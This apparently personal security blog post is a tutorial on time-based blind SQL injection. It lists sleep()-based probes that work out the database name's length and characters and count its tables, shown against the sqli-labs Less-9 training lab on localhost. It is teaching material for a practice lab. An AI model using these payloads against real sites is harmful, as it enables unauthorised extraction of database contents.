congdong007

Penetration Test、Software Developer

0%

Time-Based Blind SQL Injection

Posted on Edited on In , , ,

Time-Based Blind SQL Injection Steps:

  1. First, check if an injection vulnerability exists.
  2. Next, determine the injection type: character-based, numeric-based, or search-based.
  3. Determine the available injection method; in this case, union injection and Boolean-based blind injection are not available:
    1
    2
    3
    ?id=1' and 1=1 %23 (Page response is normal)
    ?id=1' and 1=2 %23 (Page response is normal)
    ?id=1' and sleep(5) %23
    Page experiences a 5-second delay, indicating the sleep function is injected into the database, confirming the presence of time-based blind injection.
  4. Start by obtaining the length of the database name:
    1
    2
    ?id=1' and if((length(database())>7),sleep(5),1) %23 (5-second delay)
    ?id=1' and if((length(database())>8),sleep(5),1) %23 (No 5-second delay)
    This indicates that the database name has a length of 8 characters.
  5. Proceed to retrieve the database name character by character:
    1
    ?id=1' and if((ascii(substr(database(),1,1))>n),sleep(5),1) %23
    These steps describe a method for performing time-based blind SQL injection to extract information about the database, such as the length of the database name and the characters that make up the name.

Example of Time-Based Blind SQL Injection Operation:

1
2
3
4
5
6
7
8
9
10
11
12
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' 没有任何反应
http://127.0.0.1/sqli-labs-master/Less-9/?id=1" 没有任何反应
http://127.0.0.1/sqli-labs-master/Less-9/?id=1\ 没有任何反应
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and 1=1 --+ 没有任何反应
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and sleep(5) %23 5秒钟后响应,说明是字符型盲注
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 and sleep(5) %23  响应的比较快,说明不是数字型盲注
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>7),sleep(5),1) %23 延时5秒
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((length(database())>8),sleep(5),1) %23 不延时5秒
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>114),sleep(5),1) %23 延时5秒
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((ascii(substr(database(),1,1))>115),sleep(5),1) %23 不延时5秒,得出结论,第一个字符是s,以此类推
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>3,sleep(5),1) --+ 延时5秒
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>4,sleep(5),1) --+ 不延时5秒